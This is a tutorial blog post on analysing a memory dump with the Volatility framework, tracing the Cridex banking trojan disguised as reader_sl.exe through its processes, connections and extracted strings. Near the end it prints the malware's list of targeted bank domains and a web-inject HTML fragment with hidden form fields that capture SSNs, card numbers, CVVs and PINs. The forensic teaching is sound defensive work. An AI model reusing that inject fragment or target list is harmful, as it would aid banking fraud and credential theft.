Analysing Volatility Memory Dump [6 Easy Steps]

Hello learners, in the first part of our tutorial we learnt how to obtain a volatility memory dump from a computer which either maybe the victim computer or the computer used to launch an attack. From the acquired memory dump, an investigator can be able to determine the processes that were running on the computer hence he/she can also be able to come up with solid evidence which can be used against the suspects involved in a law suit. In this guide, we will be doing a digital forensic analysis on a volatility memory dump.

 

Requirements

  • Have the memory dump to perform analysis on. (You can get a memory dump from volatility github repo).
  • Have Kali Linux operating system.
  • Have volatility forensic framework installed.
  • Have knowledge on digital forensic analysis.
  • Have python installed.

With that let’s jump right into our guide.

Advertisement

 

Installing volatility memory forensic tool.

Step 1: Download volatility from the github repo

Installing volatility memory forensic tool is just as easy as getting a tool from their official github repo. The framework is built with python. You can download it using the below command.

git clone https://github.com/volatilityfoundation/volatility.git

 

Step 2: Running volatility.

After the installation is complete. You can just navigate to the volatility folder and run it directly using the command to check the different options available.

python vol.py -h
NOTE:

If you want to install volatility  memory analysis framework so that you can  import it in other projects, you need to first run the setup.py before running volatility.

When trying to run volatility for the first time, I ran into errors as shown in the picture below which you may also run into. You can check for the solution on this post.

volatility memory

Having installed volatility and fixed any errors. We can now dive into forensic volatility memory analysis.

 

Forensic memory analysis using volatility

Step 1: Getting memory dump OS profile

Dump analysis helps us know the OS profile. We add -f to specify the file which in our case is the memdump and also specify the plugin required. We cannot start the investigation without knowing the OS profile.

Advertisement
$python2 volatility.py -f /your-memdump-location imageinfo

As shown on the image below we are able to determine the operating system of the memdump under investigation. We are able to know the PC was running on (WinXPSP2x86)

Analysing Volatility Memory Dump [6 Easy Steps]

 

Step 2:Checking the running processes

The pstree plugin in volatility helps us determine the processes that are running and also shows their parent processes.

Analysing Volatility Memory Dump [6 Easy Steps]

As shown on the image, we have a suspicious looking process “reader_sl.exe” which is under the explorer processes. After noting this, we can try check if there are any hidden processes using the psxview plugin. This plugin is useful as it shows all the processes that are running either hidden or not hidden. as shown on the image below we can see that there in hidden process which is running.

Analysing Volatility Memory Dump [6 Easy Steps]

 

Step 3: Checking for open connections and the running sockets on the volatility memory dump

After we are done with checking the running processes, we can check for the sockets that are running and the open connections on the computer. To check this, we will use two plugins; the connscan plugin and the sockets plugin. The sockets plugin will list the open sockets while the connscan plugin will check for open TCP connections.

volatility memory

After we check for the TCP connections, we note that process with ID 1484 is connected to a remote address using IP 41.168.5.140 and 125.19.103.198 using port 8080. When we check for open socket using sockets plugin, we can see that process 1484 has an open TCP connection using port 1038.

 

Step 4: Checking the last commands that were ran

We can now check for commands which were ran on the PC under investigation. Checking commands can help an investigator while he/she gathers evidence from the volatility memory dump. We will be checking out for process 1484.

Advertisement

└─$ python2 vol.py -f /home/toxic/Desktop/cridex.vmem --profile=WinXPSP2x86 cmdline
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
System pid:      4
************************************************************************
smss.exe pid:    368
Command line : \SystemRoot\System32\smss.exe
************************************************************************
csrss.exe pid:    584
Command line : C:\WINDOWS\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16
************************************************************************
winlogon.exe pid:    608
Command line : winlogon.exe
************************************************************************
services.exe pid:    652
Command line : C:\WINDOWS\system32\services.exe
************************************************************************
lsass.exe pid:    664
Command line : C:\WINDOWS\system32\lsass.exe
************************************************************************
svchost.exe pid:    824
Command line : C:\WINDOWS\system32\svchost -k DcomLaunch
************************************************************************
svchost.exe pid:    908
Command line : C:\WINDOWS\system32\svchost -k rpcss
************************************************************************
svchost.exe pid:   1004
Command line : C:\WINDOWS\System32\svchost.exe -k netsvcs
************************************************************************
svchost.exe pid:   1056
Command line : C:\WINDOWS\system32\svchost.exe -k NetworkService
************************************************************************
svchost.exe pid:   1220
Command line : C:\WINDOWS\system32\svchost.exe -k LocalService
************************************************************************
explorer.exe pid:   1484
Command line : C:\WINDOWS\Explorer.EXE
************************************************************************
spoolsv.exe pid:   1512
Command line : C:\WINDOWS\system32\spoolsv.exe
************************************************************************
reader_sl.exe pid:   1640
Command line : "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
************************************************************************
alg.exe pid:    788
Command line : C:\WINDOWS\System32\alg.exe
************************************************************************
wuauclt.exe pid:   1136
Command line : "C:\WINDOWS\system32\wuauclt.exe" /RunStoreAsComServer Local\[3ec]SUSDSb81eb56fa3105543beb3109274ef8ec1
************************************************************************
wuauclt.exe pid:   1588
Command line : "C:\WINDOWS\system32\wuauclt.exe"

After running the command we now see the process 1484 is was among one  the processes that were running on the PC. Under explorer.exe process there is the “reader_sl.exe”. This is a Adobe classic reader but it is connecting to an external IP address that looks suspicious. We can export the reader_sl.exe from volatility memory for further analysis.

 

Step 5: Exporting the reader_sl .exe

On this step we will extract the reader_sl.exe from the volatility memory dump to a folder on our PC. From here, we can be able to perform a malware analysis on the reader_sl.exe. To export the file we will be using a different plugin as shown below.

volatility memory

NOTE:

When you export reader_sl.exe it will be saved as executable.1640.exe

 

Step 6: Analyzing reader_sl.exe

Having exported the file to be analyzed, we can now analyze it using available tools for malware analysis. How you analyze the file will depend on the kind of information you want to know. So we use the VirusTotal to check if the app is malicious. Image below shows the report generated on VirusTotal check.

Analysing Volatility Memory Dump [6 Easy Steps]

The file is flagged as malicious. Alternatively, we can extract the memdump an try to read through it to see if we can find something of interest relating to our investigations. We can export volatility memory dump of the “reader_sl.exe”  using command shown below.

volatility memory

After extracting the dump file we can ow open the file to view and try and find out something useful in our investigation using the command.

 strings 1640.dmp | less
*treasurypathways.com*
*CorporateAccounts*
*weblink.websterbank.com*
*secure7.onlineaccess1.com*
*trz.tranzact.org*
*onlineaccess1.com*
*secureport.texascapitalbank.com*
*/Authentication/zbf/k/*
*ebc_ebc1961*
*tdbank.com*
*online.ovcb.com*
*ebanking-services.com*
*schwab.com*
*billmelater.com*
*chase.com*
*bankofamerica.com*
*pnc.com*
*suntrust.com*
*wellsfargo.com*
*ibanking-services.com*
*bankonline.umpquabank.com*
*servlet/teller*
*nsbank.com*
*securentry.calbanktrust.com*
*securentry*
*/Common/SignOn/Start.asp*
*telepc.net*
*enterprise2.openbank.com*
*BusinessAppsHome*
*global1.onlinebank.com*
*webexpress*
*/sbuser/*

In another part of the dump, I found the below piece. We can be able to see that the executable file is an information stealing malware. It specifically targets stealing banking information.

Advertisement

</div>
<iframe name='wj1' src='https://onlinebanking.tdbank.com/images/TDBankLogo.gif' width='0' height='0' border='none' frameborder='0'></iframe>
<form name="injectform" action="" method="post" target="wj1">
<input type="hidden" name="SSN1" id="ssn1" />
<input type="hidden" name="SSN2" id="ssn2" />
<input type="hidden" name="SSN3" id="ssn3" />
<input type="hidden" name="MMN" id="mmn" />
<input type="hidden" name="DL" id="dl" />
<input type="hidden" name="DOBMM" id="dob_mm" />
<input type="hidden" name="DOBDD" id="dob_dd" />
<input type="hidden" name="DOBYY" id="dob_yy" />
<input type="hidden" name="TDCARD" id="cc" />
<input type="hidden" name="expdate_mm" id="expdate_mm" />
<input type="hidden" name="expdate_yy" id="expdate_yy" />
<input type="hidden" name="cvv" id="cvv"/>
<input type="hidden" name="TDPIN" id="pin" />
</form>
*secure.accurint.com/app/bps/mai*
<input*name="PASSWORD_UL">
<input type="hidden" name="PASSWORD_NC" id="pass_nc">
<form*onSubmit="return prepared_pwd
login_script.js"></script>
<script type="text/javascript">
function prepared_pwd2() {
    var df = document.forms[0];
    if (df.PASSWORD.value.length < 1) {
        if (document.LOGIN && df.APPLICATION_TYPE.value != 'irb') {
            build_alert('Enter Password!','Please Enter your Password to Sign On.');
        } else {
            alert('Please Enter your Password to Login.');
            df.PA

 

Conclusion

On the above guide, we were able to perform a volatility memory analysis to gather information from a victim computer as it appears in our findings. We were able to discover a malware which has camouflaged as a known process to the user. This is one of the common method used by hackers when stealing information.

Volatility memory analysis is a powerful skill to add to your investigators arsenal. Volatility framework is extensive and helps investigators perform forensic analysis efficiently. The framework is available for the common operating systems.

 

References

Volatility memory dump samples
Mnemonic PassiveDNS
Cridex writeup
Hybrid-Analysis

 

Didn't find what you were looking for? Perform a quick search across GoLinuxCloud

If my articles on GoLinuxCloud has helped you, kindly consider buying me a coffee as a token of appreciation.

Buy GoLinuxCloud a Coffee

For any other feedbacks or questions you can either use the comments section or contact me form.

Thank You for your support!!

Leave a Comment

X